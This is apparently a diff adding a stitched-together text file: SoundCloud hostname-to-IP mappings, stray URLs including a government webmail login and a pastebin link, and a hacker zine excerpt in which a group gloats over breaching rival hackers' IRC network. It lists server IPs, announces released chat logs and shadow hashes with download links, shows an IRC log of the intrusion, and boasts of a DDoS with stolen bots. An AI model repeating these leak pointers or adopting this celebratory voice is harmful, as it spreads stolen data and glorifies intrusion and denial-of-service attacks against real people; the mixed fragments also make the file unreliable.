+75.101.163.44    dev.soundcloud.com
+75.101.163.44    developer.soundcloud.com
+174.129.212.2    developer.soundcloud.com
+75.101.145.87    developer.soundcloud.com
+75.101.145.87    developers.soundcloud.com
+75.101.163.44    developers.soundcloud.com
+174.129.212.2    developers.soundcloud.com
+178.249.136.150    feeds.soundcloud.com
+178.249.136.155    m.soundcloud.com
+178.249.136.150    media.soundcloud.com
+178.249.136.150    partners.soundcloud.com
+178.249.136.150    static.soundcloud.com
+178.249.136.150    support.soundcloud.com
+178.249.136.150    upload.soundcloud.com
+178.249.136.158    w.soundcloud.com
+178.249.136.150    www.soundcloud.com
+
+https://piratenpad.de/ioHbfAYqJW
+
+https://webmail.oag.state.tx.us/gw/webacc
+
+Create a python script to autotroll the world.
+
+http://pastebin.com/raw.php?i=5u04pXYR 
+
+http://cineinsite.atarde.uol.com.br/filme/40/scripts/script.html
+
+https://secure.ravand.com/dedicated_hw_upgrade.cfm?id=38
+
+--------------------------------------------------------------------------------
+                                                                                
+   Looks like they still haven't noticed us slowly removing everything of actual
+   value from it LOL (don't believe us? look through your revisions ;)).        
+                                                                                
+   Furthermore, we had obtained the IPs of their servers in specific, one of    
+   which they have hidden behind Cloudflare and use to host http://swaggsec.com:
+                                                                                
+   > 176.31.119.79                                                              
+   > 5.39.6.31                                                                  
+                                                                                
+   Following this, we decided to kick back and accrue PM/Chan logs. CrimeIRCd   
+   grew significantly compared to the other Anonymous networks we have hooked.  
+   As the total amount of logs neared 2 million, SwaggSec suddenly turned on    
+   their own provider as to promote their new carding network, CorruptNET.      
+                                                                                
+   The dialogue from their release:                                             
+                                                                                
+--------------------------------------------------------------------------------
+
+"""
+Ahhh How it all happened.... CrimeIRCD Hacked and OFFICIALLY OWNED! Enjoy looking
+through all the ip addresses of users who you may not like.. a few gline notices
+were left out only because there were alot more and the point was made.. but that
+is all made up in #snoop (the channel where they also spy on your private msg's)
+where it shows every user getting disconnected for being glined. List of all there
+servers and names, nicks of the users who are services admin, whole list of there
+spamfilters.. (take a look so you know what not to type on there so u dont get glined)
+and a list of there bots and there nicks.. and just plain ol' fun brought to you
+by SwaGGSeC!!!!!
+ 
+Message to hew: next time dont gline users who say they say they have a way of
+hacking your network.. u should maybe listen and ask questions.. and dont be a
+fucking dick like you always are and go glining people.. you think you are hot
+shit.. when u are just plain SHIT... now rest your head tonight to figure out what
+to do to get all the glines removed and gain access back to your network... I
+suggest a reinstall of all servers may help.. LMFAO...btw, since we have root on
+a few of your servers.. we will be continuing to have fun in other ways by using
+them for whatever we please.. 
+
+OFFICIALLY HACKED! OFFICIALLY OWNED! AND STILL OWNED FOR HOURS NOW! They have been
+down for a total of 8 hours since the making of this pastebin and still going...
+ENJOY... I know myself and my crew did :)
+"""
+
+--------------------------------------------------------------------------------
+                                                                                
+   #snoop, as it so happens, never actually existed (we verified it in our own  
+   PM/Chan logs). Second, that is not how you own a network, we would know.     
+   Attached to this release are the aforementioned 1,842,381 lines of logs we   
+   acquired, along with CrimeIRCd configuration and shadow hashes. That's how   
+   you own a network.                                                           
+                                                                                
+   As of now, SwaggSec has moved to CorruptNET, which maintains a degree of     
+   security that even Bruce Schneier himself has appraised.. oh wait..          
+                                                                                
+<Gatsby> hey <- lol HTP
+<Gatsby> what was the key for #security again?
+<Gatsby> i forgot it
+<[redacted]> bitches
+<Gatsby> ty
+                                                                                
+   Hm, guess not.
+* Now talking on #security
+* Users on #security: Gatsby bobbyflay @fame @felony @wtf911 
+* Gatsby_ (Gatsby@corrupt-993CD020.cust.teknikbyran.com) has joined #security
+<Gatsby_> wow whos the idiot 
+<Gatsby_> who let "Gatsby" in
+<Gatsby> why hello there
+<Gatsby_> so who let you in lol
+<Gatsby_> Gatsby
+<Gatsby> doesnt really matter, i couldve guessed the key myself
+<Gatsby_> It does matter it means someone is an idiot
+<Gatsby> is that surprising?
+<Gatsby_> :P
+<Gatsby_> whatever we'll check the logs later
+<Gatsby> same
+<Gatsby_> What lol
+<Gatsby_> why would you need to check logs
+* Disconnected (). <- DDOS'd off the planet, with their own bots (all stolen,
+                                                                         haha!)
+                                                                                
+   We arn't done with you, but since this isn't our fifth zine, we'll stop here.
+   See ya.                                                                      
+                                                                                
+   Files:                                                                       
+    http://doxb.in/media/htp/crimeircd/
+    http://uplink.sh/crimeircd/
+
+                                                                                
+   BTW, shoutz to Kingcope for releasing all those 0days today, nice work.      
+                                                                                
+                   .                                                            
+                                          .                                     
+                          H      .                                              
+                    ░▓▓▓▓▓▓▓▓▓▓▓        .           P                           
+                    ▒▓█▀▀▀██████░      T       ░▓▓▓▓▓▓▓▓▓▓                      
+                    ▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓  ▒▓█▀▀▀█████░                     
+                    ▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░                     
+                    ▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░                     
+                    ▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░                     
+                    ▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░                     
+                    ▒▓███▀▀▀████░▒▓███  ▀ ███░ ▒▓██ ▀ ████░                     
+                    ▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓                    
+                    ▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░                   
+                    ▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░                   
+                    ▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░                   
+                    ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░                   
+                    ▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██  ▀ ██░                   
+                    ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░                  
+        ▒░         ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒   ▒       ▒▒▓   
+  ▒▒   ▒▒░   ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒  ░▒   ▒▒▓   
+▓▒▒▒▒  ▒▒░   ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒  ░▒▒  ▒▒▒▓ ▒
+▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF